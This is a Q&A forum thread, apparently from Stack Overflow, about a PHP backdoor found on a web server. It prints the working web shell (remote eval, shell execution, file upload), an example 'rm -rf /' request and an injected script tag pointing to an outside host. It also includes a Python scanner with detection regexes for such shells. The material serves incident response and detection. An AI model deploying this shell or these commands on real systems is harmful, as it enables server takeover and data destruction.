views: 1528

answers: 8

I recently found 4 bizarre files on my server (that I didn't upload). The filenames were like this: goog1e7a20543b128921.php

And here's the code that was inside them:

Goog1e_analist_up<?php $e=@$_POST['e'];$s=@$_POST['s'];if($e){eval($e);}if($s){system($s);}if($_FILES['f']['name']!=''){move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);}?>

Do you have any idea what this code is supposed to do? Should I start to panic?

Thanks.

+12  A: 

Yep, this is malicious code. This shell script will allow the attacker to execute code as well as upload any file, if the attacker knows the parameters passed to it. I recommend searching all files for that code, verifying file permissions and changing your passwords just in case.

Hansy
+4  A: 

Delete them right NOW!

It's a backdoor into your webserver.
It allows attackers to send a request to http://you.com/goog1e7a20543b128921.php?s=rm -rf / to delete your entire system.

You should then conduct a thorough security review of your site to figure out how they got there in the first place.

SLaks
No! Move it away to a safe place instead of deleting it. You may need it for forensic purposes.
mhaller
@mhaller: What forensic purposes are you referring to? This isn't some complex virus/rootkit. It's a pretty simple piece of code, and there's not much you can glean from it except that the attacker is a poor speller.
Lèse majesté
@SLaks: actually, POST data is not encoded in the URI like GET requests. It's transmitted as the message body after all the headers.
Lèse majesté
@Lèse Majesté: e.g. the file timestamp when it was created; whether the hex code is always the same or random; which form vars had been used; the system user who created the file (e.g. apache or root or another daemon user ...), stuff like that. Yeah, this thing is simple, but anyway you should do it for all malicious scripts.
mhaller
Ah... Yeah, I guess you should record that stuff before you delete it. Is there software that logs filesystem activity like that (e.g. logs entries whenever someone creates/edits/opens/deletes a file or directory)?
Lèse majesté
+10  A: 

Suggestion to deal with the attack

I would suggest you use HTML Purifier or OWASP to make things a lot more secure.

You must disable the eval construct if you are not using that (and you shouldn't unless you really need to).

Analyze the server settings for any security holes with:

PHPSecInfo

Sarfraz
I'll definitely check out these tools. Thanks.
pnichols
@pnichols: Yup you definitely should :)
Sarfraz
+1  A: 

eval($e) - remote command execution on the system, e.g. for listing a directory. $_FILES['f']['name'] - for uploading scripts to the server, e.g. hack tools etc.

Danny
A: 

Apparently you are not the only one with these. I googled it real quick; other sites seem infected as well. It looks like the infected file stores itself in the images folder all the time.

fabjoa
http://shine.yahoo.com/channel/life/goog1e-start-up-kit-scam-443472/

Did you sign up to a Google service? It might not have been Google after all.
fabjoa
@abjoa: As said in my other comment to the question, Google will NEVER upload files to your host.
nico
@nico Yes, but a service that pretended to be Google; that's what the linked article refers to.
fabjoa
@abjoa: Sorry, I didn't see the `not` in your comment :)
nico
+4  A: 

For reference:

if($e){eval($e);}

This allows the attacker to execute any PHP command they want.

if($s){system($s);}

This allows the attacker to execute any system command they want, as whatever user your webserver runs as.

if($_FILES['f']['name']!=''){move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);}

This allows the attacker to upload any file they want - again the user your webserver runs as determines file permissions.

In summary, panic :-p

I'm sure there are lots of articles online on how to deal with this. In brief, back up your system for analysis later, then reinstall the server from scratch (you don't know what else they have done to you, so just deleting the files isn't good enough) while trying to work out how they got in and plugging the hole.

James
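The advice in this thread boils down to three steps: search every file for the shell's shape (Hansy), record who created the file and when before you touch it (mhaller), and treat the three primitives James lists above (eval on request input, a shell command on request input, move_uploaded_file with an attacker-chosen name) as the signature. The script below is an added example written for this page, not code from anyone in the thread or from any project. The signature regexes, the temp-directory layout, the extra sink names beyond the page's three, and the constructed sample web root are all assumptions; the shell content and the goog1e file name are the ones quoted in the question.

```python
#!/usr/bin/env python3
"""Added example: scan a web root for the PHP web-shell shape discussed above, record
forensic metadata before touching anything, then quarantine (not delete) the matches."""
import hashlib
import json
import os
import re
import shutil
import stat
import tempfile
from datetime import datetime, timezone

# The three sinks the shell in the question combines, plus common equivalents.
# Assumption: an illustrative signature set, not a complete web-shell detector.
SINKS = {
    "eval": re.compile(r"\beval\s*\(", re.I),
    "system_exec": re.compile(r"\b(?:system|exec|shell_exec|passthru|popen|proc_open)\s*\(", re.I),
    "upload": re.compile(r"\bmove_uploaded_file\s*\(", re.I),
}
# A file only counts when it also reads attacker-controllable request input.
REQUEST_INPUT = re.compile(r"\$_(?:POST|GET|REQUEST|COOKIE|FILES)\b")
PHP_EXTENSIONS = (".php", ".phtml", ".php5")


def classify(source):
    """Names of dangerous sinks found in PHP source that also reads request input."""
    if not REQUEST_INPUT.search(source):
        return []
    return [name for name, rx in SINKS.items() if rx.search(source)]


def file_metadata(path):
    """Owner, mode, timestamps and hash: the facts to record before the file is moved."""
    st = os.stat(path)
    with open(path, "rb") as fh:
        digest = hashlib.sha256(fh.read()).hexdigest()

    def iso(ts):
        return datetime.fromtimestamp(ts, timezone.utc).isoformat()

    return {
        "path": path,
        "size": st.st_size,
        "uid": st.st_uid,           # which account wrote it: web server user, root, ...
        "gid": st.st_gid,
        "mode": oct(stat.S_IMODE(st.st_mode)),
        "mtime": iso(st.st_mtime),  # content last modified
        "ctime": iso(st.st_ctime),  # inode changed (rename, chmod, chown)
        "sha256": digest,           # lets you match copies found on other hosts
    }


def scan(root):
    """Walk the web root and return metadata plus matched sinks for every suspect file."""
    findings = []
    for dirpath, _dirs, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(PHP_EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    source = fh.read()
            except OSError:
                continue
            sinks = classify(source)
            if sinks:
                record = file_metadata(path)
                record["sinks"] = sinks
                findings.append(record)
    return findings


def quarantine(findings, quarantine_dir, report_path):
    """Move matches out of the web root, keyed by hash, and write a JSON evidence report."""
    os.makedirs(quarantine_dir, exist_ok=True)
    for record in findings:
        dest = os.path.join(quarantine_dir,
                            record["sha256"][:16] + "_" + os.path.basename(record["path"]))
        shutil.move(record["path"], dest)
        record["quarantined_to"] = dest
    with open(report_path, "w", encoding="utf-8") as fh:
        json.dump(findings, fh, indent=2)
    return findings


# Constructed sample web root: the shell quoted in the question dropped into images/
# (where the comments say it was seen), next to two benign files.
SAMPLE_SHELL = ("Goog1e_analist_up<?php $e=@$_POST['e'];$s=@$_POST['s'];if($e){eval($e);}"
                "if($s){system($s);}if($_FILES['f']['name']!=''){move_uploaded_file("
                "$_FILES['f']['tmp_name'],$_FILES['f']['name']);}?>")
SAMPLE_FILES = {
    "images/goog1e7a20543b128921.php": SAMPLE_SHELL,
    "index.php": "<?php echo 'hello'; ?>",
    "search.php": "<?php echo htmlspecialchars($_GET['q']); ?>",  # reads input, no sink
}


def run_demo():
    """Build the sample web root in a temp dir, scan it, quarantine, and return the outcome."""
    base = tempfile.mkdtemp(prefix="webshell-demo-")
    webroot = os.path.join(base, "htdocs")
    for rel, content in SAMPLE_FILES.items():
        full = os.path.join(webroot, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(content)
    findings = scan(webroot)
    report = os.path.join(base, "report.json")
    quarantine(findings, os.path.join(base, "quarantine"), report)
    return {
        "findings": findings,
        "remaining_php": sorted(n for _, _, fs in os.walk(webroot) for n in fs),
        "report_path": report,
    }


if __name__ == "__main__":
    print(json.dumps(run_demo(), indent=2))
```

Run it against a real web root by calling scan("/path/to/htdocs") and then quarantine(...) with a directory outside the document root; the report keeps the uid, mode and timestamps so the "who wrote this, and when" questions raised above can still be answered after the file is gone from the site. Pairing the request-input check with the sink check keeps ordinary code that merely reads $_GET, or merely calls system() on a constant, out of the findings.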
A: 

Related: Try installing phpAntiVirus for the future, and ask your provider for mod_security. This might mitigate future hacks. Those files didn't materialize all by themselves on your server anyway. Get rid of all older PHP applications.

mario
A: 

Look for this in each file: script src="http://nt02.co.in/3"> If you find one, use your FTP client to look at the date the file was modified, then open all the files modified on that date and remove it.

badbo